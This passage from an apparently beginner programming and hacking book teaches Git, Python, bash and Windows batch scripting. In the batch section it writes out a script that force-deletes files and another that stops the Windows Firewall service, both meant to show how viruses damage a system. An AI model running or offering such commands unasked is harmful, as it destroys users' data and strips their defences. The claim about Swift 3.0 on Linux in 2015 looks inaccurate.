You can see I have placed a Markdown file into the staging area. The output
even suggests how to unstage files. Now if you use the commit command and then
the status command, the situation has changed. Note how we add a short message
at the end of the commit command. It becomes visible on GitHub and makes it
easier to tell recent updates apart.
git commit -m 'first commit'
git status
Now the following output is shown.
On branch master
nothing to commit, working directory clean
You have successfully created your own local repository, which is distinct
from the working folder. Now you still need to connect your local repository
with the GitHub repo. Typing in the entire URL of the GitHub repo every time
would soon become tiresome, not least because it is error prone. Luckily you
only need to do it once per project, with the following command.
git remote add origin https://github.com/username/projectname

The final command, below, places what is in your local repo onto the GitHub
repo. In short it states that the local branch 'master' is pushed to the
remote 'origin' defined in the previous command. Be sure of what you upload:
once something has been pushed to a public repo, treat it as published. You
can rewrite history afterwards, but anyone may already have cloned it, so a
password or key that went out by accident has to be replaced, not just
deleted.
git push -u origin master
Enter your GitHub username when prompted. Since 2021 GitHub no longer accepts
your account password for Git over HTTPS; use a personal access token in its
place, or set up SSH keys. Also note that repositories created on GitHub now
get a default branch called main rather than master, so push the branch name
you actually have (git status tells you). If all has gone well your file has
made its way to the GitHub website. Go check it out! Whenever you have updated
your project you can place the changes on GitHub the same way for everybody
else to download.

On a side note, often we only want to upload source code to GitHub and not,
for example, compiled binaries. Git lets us be selective about the files we
add and commit between the working directory and the remote GitHub repo. With
a .gitignore file we exclude files matching patterns of our choice. The first
step is to create such a file.
echo '*.txt' > .gitignore
The pattern must contain the wildcard: a line reading just .txt would only
ignore a file literally named .txt. With *.txt, files with the extension .txt
are no longer offered for staging. This is just to illustrate the possibility,
but perhaps you don't want to place files full of notes online.

If we use git status again we get a message that .gitignore itself is
untracked and has yet to be committed. With git add we place it in the staging
area.
git add .gitignore

From there on the procedure is the same as any other commit-and-push cycle.
Next time we create more files in the working directory and add them to the
staging area, those with the .txt extension are skipped. Two caveats. First,
.gitignore only affects files Git is not yet tracking: a file that was
committed before the pattern was added stays tracked until you remove it with
git rm --cached. Second, .gitignore is pushed to the remote repo along with
everything else, which is normal, but if you have forgotten about its
existence you can be bug hunting for a while wondering why a file never shows
up.

Downloading files with Git
Using the Git Bash command line tool on Windows, or just a Terminal on Linux,
it is simple to download a repository. To obtain a copy of a Git repo use the
following command.
git clone /path/to/repository
If you are downloading from a website you give the full URL of the repository
instead of a local path. To download the hackbook code from above, for example
git clone https://github.com/username/hackbook
The repository is now downloaded into a folder inside the directory you are
in. Navigate into it to see its content.
cd hackbook/
Unlike wget, clone does not merely fetch a snapshot of the files: it creates a
complete local repository with the full history, and records the address you
cloned from as the remote 'origin'. What it does not do is keep that copy up
to date afterwards. With pull you bring in later changes: if another developer
has updated the GitHub repo, your local copy is changed to reflect that.
git pull origin master
Astute readers will notice a problem. What if the GitHub repo has been changed
but so has your own local repo, and you don't want your changes overwritten?
We can split pull into its two steps. With fetch we download the remote
commits and store them under the remote-tracking branch origin/master, not in
the branch you are actively working on.
git fetch origin
After we have reviewed the downloaded code we use merge to bring the two
branches together.
git merge origin/master

Branching
This final command leads us to the most interesting feature of Git for
professional users: branching. If you want to add a new feature to your
project but keep a copy of the code the way it was, use the branch command. It
sets up a parallel line of development that you can alter without fear of
mixing up your code. The following step sets up such a branch, which we call
anotherbranch.
git branch anotherbranch
To switch to this branch and work on the code use the checkout command as
follows
git checkout anotherbranch
Now you are all set to make changes on the second branch. You can create as
many branches as you want, though for a small project it is usually no more
than two: one master branch and one branch for code under test. So let's try
branching out. After you have run the two commands above, create a new text
file called test.txt with some dummy sentences in it and copy it into your
project folder. If we now run 'git status' we are told there is an untracked
file. Next we add it to the staging area with 'git add .' and ask for the
status again with 'git status'. As we are still on the second branch,
anotherbranch, the file will be committed to this branch and not to master.
To commit it use 'git commit -m "add textfile"'.
If you now use checkout to switch to the master branch and run ls
git checkout master
ls
you will notice that the text file is not present on the master branch.

Merging and deleting branches
We can choose to merge branches if we want to. The method is simple: check out
the branch that should receive the changes. In this case we want the master
branch to take in anotherbranch, as it contains the file we have been working
on. With master checked out, use the following command to merge the two
git merge anotherbranch
If we use 'ls' we see the file has been added to the master branch. 'git
status' reports that this branch is one commit ahead of origin/master, the
copy on GitHub. With 'git push' we can send the updated master branch to the
remote repo if we want.
Finally we can choose to delete a branch. As an example we delete anotherbranch
with the following command.
git branch -d anotherbranch
It is now removed. The lowercase -d refuses to delete a branch whose commits
have not been merged anywhere, which protects you from losing work; -D forces
the deletion.

Conclusion
If you still find Git and GitHub too daunting, try a GUI client. For Windows
there is GitHub Desktop (not to be confused with the website), while git-cola
and SmartGit can be used on Linux (and Windows). On the next page I end this
chapter with some commonly used commands to get the lay of the land.

Resetting to the current HEAD
HEAD is the commit your working directory is based on, normally the tip of the
branch you have checked out. The following command throws away all
uncommitted changes in tracked files and restores that commit.
git checkout -f HEAD
Use it only when you really want to discard your edits; they cannot be
recovered. If you just want to know which commit HEAD is, git log shows it as
the first entry.

A git situation
You have made a mess of things and want to overwrite your local master branch
with origin/master
git checkout master
git fetch --all
git reset --hard origin/master
The reset discards every local commit on master that is not on origin/master
as well as all uncommitted changes, so make sure there is nothing you still
want to keep.

List all branches
To get an overview of all the branches use the branch command. The switch -a
shows all local and remote branches, while -r shows only the remote branches.
git branch -a
git branch -r

List all commits
Using git log we can list all previous commits and see which branches they
belong to
git log --all --decorate --oneline
The plain command git log --all is very verbose. For a better overview add the
--decorate and --oneline switches: each commit is then printed as a single
line, and the names of the branches and tags pointing at it are shown next to
it.
A very convenient additional switch is --graph. The commits are then drawn
along their branches, showing how each branch evolved over time.

Tracking changes to a single file
For each file in the repository it is possible to list the commits that
changed it, even across renames, with the --follow switch. In the case below
the file index.php is tracked. When you are testing your software, seeing who
changed what and when is invaluable.
git log --follow index.php

Tracking your peers
With the shortlog command you get an overview of every commit made to a
project, grouped by author.
git shortlog
Resolving a merge conflict
A very common problem with Git is that more than one developer has changed the
same part of a file. When that happens the merge command does its best to
combine the branches, and each section it cannot reconcile is marked in the
file. This makes it easy for the developer who integrates the branches to see
what has to go and what can stay. An example is as follows. Suppose I create a
small C program called merge.c. After a while two developers each change it in
a slightly different way, so each branch has one unique line.
The original program is the familiar Hello, World! example.
/* Hello World program */

#include <stdio.h>

int main(void)
{
    printf("Hello World");
    return 0;
}
Developer A changes the print statement to
printf("Hello from developer A");
and developer B uses yet another variation
printf("Hello and good afternoon");
Merging the two branches now produces a conflict. After the git merge command
the contents of merge.c look as follows
/* Hello World program */

#include <stdio.h>

int main(void)
{
<<<<<<< HEAD
    printf("Hello from developer A");
=======
    printf("Hello and good afternoon");
>>>>>>> branch-a
    return 0;
}
Git has clearly marked the two versions: the lines between <<<<<<< HEAD and
======= are from the branch you were on when you ran the merge, and the lines
between ======= and >>>>>>> branch-a come from the branch being merged in. The
file will not compile with these markers in it, so a developer is forced to
choose: keep one side, keep the other, or write a combination, then delete the
marker lines, git add the file and commit to finish the merge.
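To see what the markers mean mechanically, here is a small Python script that reads text containing such markers, separates the HEAD side from the other side, and produces a version with one side (or both) kept and every marker line removed. It is an added example, not code from the book or from Git itself; the sample text is a constructed copy of the merge.c conflict above, and the function names are the author's own. Git offers the same two choices directly (git checkout --ours / --theirs on the file), but the script makes the structure of the markers explicit and can double as a check that no marker slipped into a commit.

```python
"""Parse and resolve Git conflict markers in a text file.

Added example, not part of the original book. CONFLICT_SAMPLE is a
constructed copy of the merge.c conflict shown above; parse_conflicts,
resolve and has_markers are the author's own names, not Git commands.
"""

CONFLICT_SAMPLE = """\
/* Hello World program */

#include <stdio.h>

int main(void)
{
<<<<<<< HEAD
    printf("Hello from developer A\\n");
=======
    printf("Hello and good afternoon\\n");
>>>>>>> branch-a
    return 0;
}
"""


def parse_conflicts(text):
    """Split a file with conflict markers into a list of segments.

    Ordinary lines become ('text', line). Each conflict becomes
    ('conflict', ours_lines, theirs_lines, their_label), where "ours" is
    the side between '<<<<<<< HEAD' and '=======' (the branch you were on)
    and "theirs" is the side between '=======' and '>>>>>>> label'.
    Raises ValueError on a malformed or stray marker.
    """
    segments = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        if line.startswith("<<<<<<< "):
            ours, theirs = [], []
            i += 1
            while i < len(lines) and lines[i] != "=======":
                ours.append(lines[i])
                i += 1
            if i >= len(lines):
                raise ValueError("conflict without '=======' separator")
            i += 1  # skip the ======= line
            while i < len(lines) and not lines[i].startswith(">>>>>>> "):
                theirs.append(lines[i])
                i += 1
            if i >= len(lines):
                raise ValueError("conflict without '>>>>>>>' terminator")
            label = lines[i][len(">>>>>>> "):]
            segments.append(("conflict", ours, theirs, label))
            i += 1
        elif line == "=======" or line.startswith(">>>>>>> "):
            raise ValueError("stray marker outside a conflict: %r" % line)
        else:
            segments.append(("text", line))
            i += 1
    return segments


def resolve(text, choice):
    """Return the file with every conflict resolved.

    choice is 'ours', 'theirs' or 'both' (ours followed by theirs). The
    result contains no marker lines, which is what the compiler needs.
    """
    out = []
    for seg in parse_conflicts(text):
        if seg[0] == "text":
            out.append(seg[1])
            continue
        _, ours, theirs, _label = seg
        if choice == "ours":
            out.extend(ours)
        elif choice == "theirs":
            out.extend(theirs)
        elif choice == "both":
            out.extend(ours + theirs)
        else:
            raise ValueError("unknown choice: %r" % choice)
    return "\n".join(out) + "\n"


def has_markers(text):
    """True if any conflict marker survives; useful as a pre-commit check."""
    for line in text.splitlines():
        if line.startswith(("<<<<<<< ", ">>>>>>> ")) or line == "=======":
            return True
    return False


if __name__ == "__main__":
    print(resolve(CONFLICT_SAMPLE, "theirs"))
```

Run it as is to see developer B's version of merge.c printed without markers; change "theirs" to "ours" or "both" for the other outcomes. In practice the "both" choice is the one that needs a human look afterwards, because two correct halves are not necessarily a correct whole.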

Part 2. Programming

Chapter 1 Beginning Programming with
Python

Introduction to programming
This part of the book deals with programming on Linux. In chapter 1 I explain
the basics of programming with Python, an easy to learn yet powerful language.
I discuss conditional statements, which allow programs to make choices, as
well as loops, user input and functions. These are considered the basic tenets
of all programming languages. In subsequent chapters more difficult topics are
discussed, using different programming languages such as C, Java and Perl. An
example program at the start of each chapter shows that the basic programming
concepts are the same and are simply written in the syntax of that language.

What is Python?
Python is an interpreted programming language developed by Guido van Rossum
and first released in 1991. Interpreted means the program is run straight
from its source code by the python interpreter as soon as it is started.
There is no separate step in which you convert the source file into machine
code (the zeroes and ones the CPU executes). A Python script therefore feels
almost like a file of command line instructions that are executed one after
the other, and scripts are a convenient way to store the long or complicated
sequences of commands we want to run regularly.
The examples in this chapter are written for Python 2, the version Ubuntu
shipped as python when this book was written. Python 2 reached its end of
life in January 2020. In Python 3, print is a function and has to be written
print("..."), and raw_input() is simply called input(); apart from that the
concepts below carry over unchanged.

Variables
There are several basic things every program must be able to do; without them
there would be no point to computers. The first is memory, storing data in a
variable. With any complicated piece of mathematics you ordinarily write down
intermediate results to help you along the way, and you give parts of the
result names such as X, Y and Z. Programming languages let you do the same.
Use gedit or your favorite text editor to open a file called 'first.py' and
type in the following four lines of code. The extension .py is a reminder
that this is a Python program.

#!/usr/bin/python
x = 'This is a String'
y = 3
z = True

We have now assigned values to three variables. The first is a string of
characters, spaces included, delimited by single quotes ''. The second is an
integer variable holding the value 3; had the 3 been written between quotes it
would have been a string. Finally we assigned a Boolean value to z. The
Boolean values True and False are self-explanatory; they come into their own
in conditional statements. Because variables change, through user input or as
an algorithm runs, the flow of a program can change with them, and Boolean
variables are often the switch that changes a program's course. Also note the
odd first line we had to type. It is a household chore: a line starting with
#! (a 'shebang') tells Linux which interpreter to run the file with when you
make it executable and start it directly as ./first.py, and /usr/bin/python
is where that interpreter lives (cd to /usr/bin/ to check). When you start the
script through the interpreter yourself, as below, the line is simply a
comment.
You can run this program, first.py, by typing the following into the command
line.
username@ubuntu:~$ python first.py
The program runs, but sadly there is nothing for the user to see, because the
three variables disappear as soon as the program ends.

Output
A program is of no interest if it produces no output after its calculation. In
this book we forgo graphical windows and menus. They are cool but absolutely
not necessary. In Python the print statement outputs anything you want to the
Linux Terminal.
print "Hello World!"
If you add this line below the three assignments in first.py and run the
program again you will see the following output
Hello World!
The program once again assigns the three variables x, y and z the values we
gave them before, then prints 'Hello World!'. On completion the three
variables are again deleted from memory.

Input
To add further functionality we can ask for user input. In Python the function
raw_input() pauses the program until the user types something on the command
line and presses Enter. Add the statement
raw_input()
below the four lines already written and run the program: you see the words
Hello World! printed, followed by a blinking cursor indicating you can type
something. If you do and press Enter, the program simply ends.
As you may have guessed, the text the user typed was never used. We need to
assign it to a variable to keep it. The two lines below store the result of
raw_input() in a variable called mydata and then print the contents of that
variable.

mydata = raw_input('Type something: ')
print(mydata)

Notice that when the program runs the user sees the words 'Type something: '
on the command line in front of the cursor. This is an optional feature of
raw_input(). It is called a function parameter, and using parameters can make
life much simpler. To learn about all the possible parameters of a built-in
function, use Google, or go to
https://docs.python.org/2/library/functions.html for a list of the built-in
functions. If you select raw_input() you can see it has a single optional
parameter, [prompt]. Whatever you write in its place is printed on the command
line, so you can guide users to the correct input. Whatever they type comes
back as a string, no matter what it looks like, and that is exactly what you
want: Python 2 also has a function called input(), which evaluates the typed
text as Python code, so never use that one on anything a stranger can type.

Conditional Statements
So far our programs have been linear: each line is executed one after the
other from top to bottom. Most programs have at least some branching of
possible actions. One universal tool is the if-else statement. It gives us the
flexibility to execute a set of lines only if a predefined condition is met.
Let's look at an example

#!/usr/bin/python
x = int(raw_input("Please enter an integer: "))
if x < 4:
    print('That is a small number')
else:
    print('That is a larger number')

I hope you understand what happens here. The if statement guards whether the
indented line underneath it is executed. If the guard evaluates to true it is,
which needs an input of 3 or lower. If the input is 4 or higher the guard
evaluates to false and that line is skipped; instead the indented statement
below else: runs. (Typing something that is not a number makes int() raise a
ValueError, and the program stops with an error.) You can view this as a very
simple tree: everything above the if-else statement is the root, which then
branches out in two directions. Note the indentation of the statements. In
most programming languages indentation is just there for readability. In
Python it is a necessity, because it is what tells Python which lines belong
to the if-block or the else-block and which do not. As an example, add another
print statement to the if-block as follows.

if x < 4:
    print('That is a small number')
    print('I can print even more...')
else: .....
The second line is also printed when the guard evaluates to true. Any
statement indented (by four spaces, the usual convention, or a tab, but never
a mix of the two) after the if or the else belongs to that block and runs or
not depending on the guard. The first statement that is not indented ends the
if-else block.
The else: part is optional. You can also nest conditional statements inside
conditional statements.
So far I have used the mathematical operator < as a guard, but from your high
school maths you know more. Each of the following can be used in a conditional
statement.

< less than
<= less than or equal to
> greater than
>= greater than or equal to
== equal
!= not equal
You can combine as many guards as you like with or and and (in Python these
are written as words; C and Java use || and && for the same thing). An example
would be as follows

if x < 0 or x == 100 or x >= 1000:
    print('We want negative numbers, and 100')
    print('As well as numbers of 1000 or more')
else: .....
While and For loops
One of the strengths of computers is that they can perform an action many
times over, rapidly. So far our programs have been linear, executing from top
to bottom; the conditional statement added zest by letting the program
perform certain actions while skipping others. With while and for loops we
can repeat certain parts of the program until a condition has been met. With a
while loop a program can in theory run for ever, until input arrives that
makes the loop condition false and so breaks out of the loop.
A while loop has three important components: an initialized variable, a
conditional statement and an update of that variable (the iterator). The
structure looks as follows

initialize the variable
while conditional statement:
    do something
    update the variable

When the indentation stops after the while block the program continues past
the loop, as soon as the condition is no longer met. Below is an actual
example of a while loop

#!/usr/bin/python
one = 0
while one < 5:
    print "We are at " + str(one)   # str() because a string and a number cannot be glued together
    one += 1                        # same as one = one + 1
print "And now we are out of the loop"

I hope you have a good idea of what this code does before you run it. The
while loop runs as long as the value of the variable one is 4 or smaller. In
each iteration two lines are run. The first prints a short sentence and the
variable to the command line; str() is needed because Python refuses to add a
number to a string. The second line adds 1 to one. So after the first
iteration the value of one is 1, then 2, then 3, then 4.
The statement one += 1 might at first be confusing. You can also write it as
one = one + 1 if you want clarity. It means the current value of one is
retrieved, 1 is added, and the result is stored back in one, overwriting the
old value. (Other languages have a shorthand one++ for this; Python does not.)
After one reaches 5 the while condition is false and the loop body is not run
again. The program breaks out of the while block and runs the next line, in
this case the print statement that says "And now we are out of the loop".
Remember, all the indented lines after the while statement are part of the
loop and run until the condition evaluates to false. You can add as many lines
as you like to your loop.
A for loop also executes part of the code repeatedly, but it runs once for
each item of a collection, so the number of iterations is fixed by the data
rather than by a condition.

#!/usr/bin/python
fruits = ["banana", "strawberry", "orange", "apple"]
for food in fruits:
    if food == "strawberry":
        print("Strawberry yet again!")
    print("Great, delicious " + food)

The program above shows the basics of a for loop. We first create a list, in
this case a list of four string values that we call fruits. The for loop
iterates over each member of this finite list. Each time one member is plucked
and temporarily placed in the variable food. The loop therefore runs four
times, each time with a different value in food, but only once does the
conditional guard evaluate to true and print "Strawberry yet again!". The
second print, indented only as far as the if, runs for every fruit.
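The Input, Conditional Statements and loop sections above each show one piece; the following program, an added example and not from the book, puts them together. It is written for Python 3 (where raw_input() is called input()). To make it testable without a keyboard, the function that asks the question receives the source of answers as a parameter, so a constructed list of answers can stand in for the user; all function names are the author's own. It shows what happens when the user types something that is not a number, which the int(raw_input(...)) line above does not handle, and uses a while loop with an attempt limit and a for loop with continue.

```python
"""Validated input, conditionals and loops together.

Added example, not from the original book. Written for Python 3, where
raw_input() is called input(). read_int takes the source of answers as a
parameter so the canned list below can stand in for a keyboard; the
function names are the author's own choice.
"""


def parse_int(text):
    """Return (True, value) if text is an integer, else (False, None).

    int() raises ValueError on anything that is not a number, so the
    caller never sees an exception from a bad answer.
    """
    try:
        return True, int(text.strip())
    except ValueError:
        return False, None


def classify(x):
    """The decisions from the if/else examples above, with Python's or/and."""
    if x < 0 or x == 100 or x >= 1000:
        return "special"
    if 0 <= x < 4:            # chained comparison: 0 <= x and x < 4
        return "small"
    return "larger"


def read_int(ask, answers, attempts=3):
    """Ask until an integer arrives or attempts run out.

    'answers' is any function that takes a prompt and returns a line of
    text: input for a real user, or the closure from scripted() below.
    Returns the integer, or None if no attempt produced one.
    """
    tries = 0
    while tries < attempts:
        ok, value = parse_int(answers(ask))
        if ok:
            return value
        tries += 1
    return None


def classify_all(lines):
    """For loop over a list of text lines: count each category and skip
    lines that are not numbers with continue."""
    counts = {"small": 0, "larger": 0, "special": 0, "invalid": 0}
    for line in lines:
        ok, value = parse_int(line)
        if not ok:
            counts["invalid"] += 1
            continue                  # go straight to the next item
        counts[classify(value)] += 1
    return counts


def scripted(answers):
    """Turn a list of canned answers into the 'answers' function read_int
    expects; constructed stand-in for a user at the keyboard."""
    pending = list(answers)

    def next_answer(prompt):
        return pending.pop(0) if pending else ""
    return next_answer


if __name__ == "__main__":
    # Interactive use: the page's own program, now robust against "abc".
    number = read_int("Please enter an integer: ", input)
    if number is None:
        print("No valid number given")
    else:
        print("That is a %s number" % classify(number))
```

Run it directly and type letters instead of digits: instead of a ValueError traceback you get three chances and then a clear message. Keeping the input source as a parameter is also what makes the function easy to test, which is a habit worth picking up early.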

Functions
While writing programs you will quickly discover that certain parts repeat
themselves. It would be a lot easier if you could write a piece of code once
and re-use it as often as you like. In Python and other languages such pieces
of code are called functions; in Java they are called methods.
In the code below we create a function called printme() which is called
afterwards. The way this works is simple: a function definition starts with
the keyword def, so Python knows a function follows. The function does not
run on its own; if it is never called, its code is simply ignored during the
run.
Python requires that a function is defined before the line that calls it is
reached. As you may remember, Python is interpreted and runs the file from the
top, so it has to have seen the def of printme() before it can run a call to
it. That is why definitions usually sit at the start of the file. After the
definition we run the function once with the line that just says printme().

#!/usr/bin/python

def printme():
    print "Yet again we say 'Hello, World!'"
    return      # optional here: a function without a result ends on its own

printme()

After you have run this little example you may recognize something. The way
printme() is called feels similar to the way we used raw_input(). Indeed
raw_input() is also a function, one that somebody else has already written.
Just like raw_input(), you can call printme() as often as you like. For an
example as simple as this we would not normally write a function; just using
print would suffice (and in Python 3 print is itself a function).
Functions are a powerful tool. We write one when we perform an action for
which there is no ready-made function and we think we may use it more than
once in a program. printme() takes no parameters and returns nothing, but a
function can do both: the names between the parentheses in the def line are
its parameters, and return hands a result back to the caller.
Memorizing the functions that already exist is not easy; you need to get
familiar with Python. After all, you don't want to write code when there is
already a function available. The best way to proceed is to find, with
Google, sample code of what you want to do. In time you will learn to remember
functions. Though I admit I have written plenty of functions only to later
discover there was already one available.

Conclusion
Python is an easy programming language to master. There are no additional
steps required to run the code: compiling is not necessary and Python has a lot
of easy-to-master functions. If you are new to programming and you want to
delve deeper into the topic then only three languages are an option: Java, C
and Python. Java is still the most popular programming language, but it does
require the installation of a development kit so you can compile your code. C
is popular at universities that want to teach students all the nitty-gritty of
Computer Science. With Python you can do much of the same with a lot less
code. If you need to choose a language then let it be Python!

Chapter 2 Shell scripting and using Shell as a programming language

Shell Scripting
In Linux you can easily open Gedit and type some code to test a programming
idea. But you can also use the Shell itself for programming. This has two
advantages: the Shell is always available, and you can use Linux commands
directly to perform small utility functions. With shell programming you can
use pretty much all the Terminal commands you have learned and control every
aspect of the system. For hacking purposes you need root access to perform
tasks on a target, but it is access to shell scripts that truly gives you power
as a user.
The Shell (Terminal) has some superficial similarities to the Windows
command prompt. However, it is capable of running more complex functions.
Shell scripts are little programs and do not require the user to compile them.
Shell programming is done in a file just like Python programming.

Our first Shell script
With Gedit you open a file with the extension .sh, for shell. Type the
following line into Terminal to start writing the Hello, World example in shell.
$ gedit helloworld.sh
Now you have an empty shell file open. To make use of shell functions the first
line needs to be #!/bin/bash. The #! is also referred to as the shebang and is
necessary to run the interpreter program of the Bourne Again Shell. We
complete this shell example by adding two more lines.

#!/bin/bash
STRING="Hello Hackers!!"
echo $STRING

The first additional line stores the string Hello Hackers!! in a variable
named STRING, while the second additional line prints (echoes) the variable
to the command line. The dollar sign $ is vital to denote that it is a
variable.
After saving and exiting this file we can try and run our first script (the
file must first be made executable with chmod +x helloworld.sh). Remember
that shell programs don't need to be compiled as they merely run shell
commands in a particular sequence that could also be typed on the command
line; the shell interprets them at run-time. The following line runs the code.
$ ./helloworld.sh

User input
You can also get input from the user by asking them to type into the command
line. Such input can be used to direct the flow of a program with the
conditional statement - just like in Python.

#!/bin/bash
echo "Hello user!"
echo "Please type in F if you're female or M if you're male."
read gender
if [ "$gender" = F ]; then      # quote the variable so an empty answer does not break the test
    echo "Hello woman!"
elif [ "$gender" = M ]; then
    echo "Hello man!"
else
    echo "Error, incorrect input!"
    exit 1
fi
exit 0

Unlike with Python the indentation is entirely optional; it is simply convenient
for those reading your code. With the command read, user input is requested.
When the user hits the Enter key the data they typed is placed into the variable
gender and the program resumes. Next follows a conditional check. If the input
is either F or M the corresponding lines are printed out. As there is no check
on what a user can input there is also a third option that says the input was
not as requested. The conditional statements are finished with fi. Shell
scripting is very easy, but there are a few things that may trip up beginners.
Notice the spaces in the conditional statement, between the brackets [ ] and
the comparison of the variable gender and the character. If you omit the
spaces the program won't run as intended; Shell needs the spaces to delimit
programming functions! Quoting the variable as "$gender" matters just as
much: if the user only presses Enter the variable is empty, and an unquoted
test collapses to [ = F ], which the shell rejects as an error.

Another difficult topic with Shell is Boolean evaluation. In the above code we
used one equals sign = to compare a character with whatever value we had
assigned to $gender. Comparing numerical values is different and is done with
-eq (equal) and -ne (not equal). Below is a table with the most commonly
used variants.

Function                                    Comparator
String tests
  s1 equals s2                              s1 = s2
  s1 does not equal s2                      s1 != s2
Numeric tests
  Integer a is equal to b                   a -eq b
  Integer a is not equal to b               a -ne b
  Integer a is greater than b               a -gt b
  Integer a is greater than or equal to b   a -ge b
  Integer a is less than b                  a -lt b
  Integer a is less than or equal to b      a -le b

Environment variables
In the very first example of this chapter we assigned a String value to the
variable STRING. Linux also has a number of environment variables used to
store information about the system. These can also be used in scripts. Below is
a small script that prints out the most common variables.

#!/bin/bash
echo $PWD
echo $PATH
echo $HOME
echo $SHELL
echo $USER

As I hinted in the introduction we can use shell scripts to run ordinary Linux
commands such as those you learned in the first part of the book. However,
commands can be used in two ways. They can be run as is, or their output can
be evaluated to see if the result meets a certain criterion. The latter is
similar to a pipe |.

#!/bin/bash
if [ $(whoami) = "root" ]
then
    echo "You have God-mode on"
else
    echo "You're regular Joe"
fi

The above example illustrates this concept. In this script the command whoami
is run and its output is compared with the string value root. Note the dollar
sign $ and the two parentheses () around whoami: they substitute the output of
the command into the comparison. Without them, whoami on a line of its own
would simply print its output to Terminal. An older way to achieve the same is
through the use of back ticks ` (not single quotes ') placed around the
command: `whoami`. You will find the back tick on the keyboard on the tilde ~
key.
Now that the introduction to Shell programming is over we will write a
program that creates a backup of all files within a designated directory, the
directory the script is run from.

#!/bin/bash

# Script to make back-up copies of files in current directory

CURDIR=$(pwd)          # the current directory is retrieved with pwd
ORIGFILES=$(ls)
UNWANTED="bak"

echo "Getting ready to back up $CURDIR"

if [[ $ORIGFILES =~ $UNWANTED ]]   # matched: a .bak file is already present
then
    echo "Already bakked - what now?"; exit 1
else
    for f in $ORIGFILES            # for all files in listed directory
    do
        cp "$f" "$f.bak"           # copy the file and add extension .bak to the file
    done
fi

Another addition to the program is the ability to zip all of the backup files. The
following lines can be typed or pasted below the lines we already have.

echo "Zipping up the files"
tar -cf $(pwd).tar *.bak
echo "done"
exit 0

With shell scripts we can also start other programs easily. In fact, shell is
often used as glue for starting multiple services written in other programming
languages. Try it with our Python examples.
You can add the ampersand sign & after such a startup command to run the
program in the background. This way you can start multiple programs
simultaneously. You can also add nohup before your application to ensure the
application continues after you log out of the computer. The change-directory
command cd can be used in Shell just like on the command line. This allows
you to organize code and scripts in separate folders while providing one
simple script as the interface.

Wrap up
Now you should be able to understand that shell programming is very
powerful. It is at the core of a Linux system administrator's toolbox.
Programmers also like it; they often code small examples to test out new ideas
before they move on to programming languages that non-Linux systems can also
understand.
Compared to true commercial applications these scripts are nothing in size
and complexity. Nonetheless dealing with complexity is an important
programming skill. Programmers work on small bits of code at a time. They
make sure that the parts work fine. If the end result isn't what they hoped it
would be they can trace the problem quickly to one of the constituent parts.
One important thing to remember is that with shell scripts you can easily
execute other shell scripts, or programs written in another language. In fact,
with many open source software projects you will see a folder containing files
with the extension .sh and .bat (batch file), the Windows equivalent of a shell
script. This will be the topic of discussion in the next paragraph.

Other programming languages
If you use the Shell in the way described above you're performing shell
scripting, probably the most common programming task anyone on Linux
performs. Unlike other programming languages shell scripts are not compiled;
instead they are interpreted. The commands in a Shell script are executed
directly as though a user were typing them on the command line. The
advantage is that more complex commands are possible: you can use
conditional statements or perform a task multiple times with a loop. Other
interpreted languages besides Shell include Python, BASIC and the Windows
equivalent to Shell called PowerShell.

Batch programming in Windows
Windows has an equivalent to Shell programming called Batch programming.
Such scripts are stored in Batch files that have the file extension .bat or .cmd
with Windows NT. Batch files can be written with a simple text editor such as
Notepad or WordPad. Our first example will be a three line program that prints
Hello, World!

@ECHO off
ECHO Hello World!
PAUSE

Save the program as helloworld.bat as a plain text document in your Windows
Desktop folder. After you're finished you will find an icon containing two
little gears entitled helloworld. You have now created your first batch
program. You don't need to compile; it is interpreted just like a Shell
program. The program is executed either by double-clicking on the icon or by
using cmd and navigating to Desktop. Starting the program requires the user to
type in the name of the file; no prefixes such as .\ or extensions such as .bat
are necessary. The output of the program should be as follows
Hello World!
Press any key to continue . . .

This may be a little bit surprising, but it is logical. If the program did not
include the command PAUSE it would stop immediately and you could not see
the output. @ECHO off prevents the command prompt from being printed
before every line. The following program has more functionality.

@echo off
echo Loading.
ping www.google.com -n 2 > nul
cls
echo Loading..
ping localhost -n 2 > nul
cls
echo Loading...

This program prints out the line Loading three times, each time with an added
dot. Before this happens the screen is cleared of all printout with CLS to make
it look like an animation. Meanwhile the ping command is executed twice as an
example of a command that takes at least a few seconds to complete.

Batch can be extended by requesting user input. This can be accomplished with
the set command.

set /P Phrase=Please, say something!

This will place the user input in the variable Phrase. /P is a necessary switch
denoting user input. The text after the equals sign is shown to the user as a
prompt before they type.

As you may have heard on the news, over the last two decades Windows has
been a vulnerable operating system. Much has improved, but unsuspecting users
are still known to download files with viruses, worms and rootkits. For a
start, a .bat file can contain dangerous file operations such as file deletion
with del and file renaming with ren. It goes without saying that it will ruin
your Windows OS if you were to have these commands run through your entire
file system.

A careful test will illustrate my point. Create a folder called test on your
Desktop that contains a file called hello.txt, which can remain empty. By
executing the following script you will delete everything in that folder, in
this case hello.txt.

@echo off
::----Delete My Documents----::
:: %userprofile% already expands to C:\Users\<name>, so it is not prefixed again
del /f /q "%userprofile%\Desktop\test\*.*"
::---------------------------::

Alternatively you can easily switch off the firewall.

@echo off
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::

Both instances are just examples of how easy it is to screw up Windows if you
want to. I hope these little examples have shown how a computer can be
infected with a virus or worm when such a file is transmitted as an attachment
through Outlook, or on a USB stick.

Conclusion
In chapter 2 we dealt with Shell scripting. You may not have learned any
new syntax as we already discussed conditional statements and loops in
chapter 1. Yet learning to use the shell is important for any Linux user.
Finally this chapter briefly touched upon Batch programming in Windows. It
was really just an excursion to show there is no magic taking place. To top it
off there is yet another excursion, a brief chapter on programming in Swift.
After that, chapter 3 will detail memory pointers in C.

Introduction to Swift
These extra chapters are intended to teach you something extra beyond the
core material that you may otherwise not come into contact with. One of those
things is Swift, Apple's hot new programming language intended to replace
Objective-C. In fact, Swift can now also be used on other platforms besides
Apple's OS X and iOS. Since December 2015 Apple has made Swift 3.0
available for Linux. There are still limits. To create apps for Apple products
there will need to be a development framework such as Xcode. Sadly Apple
has not released that. At this moment we can only wait for an open source
port. However, you can create applications such as games, text editors and
webservers on Linux. So let's give Swift a try on Ubuntu!

Installing Swift
The first step is to download the Swift Development Snapshot from
swift.org/download/; choose the latest Ubuntu version. Next unpack the file
you downloaded and put the folder in your workspace. This will then become
the location of your Swift installation. You may also optionally choose to
shorten the folder name. I have chosen
Swift_3.0
Next we need to install some dependencies for Swift in order to develop code.
sudo apt-get install clang libicu-dev
Clang is a compiler for C, C++ and Objective-C. A lot of low level Swift is
